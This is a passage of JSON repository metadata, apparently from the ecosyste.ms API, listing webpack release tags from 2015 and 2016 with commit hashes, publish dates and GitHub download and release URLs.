ub.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z",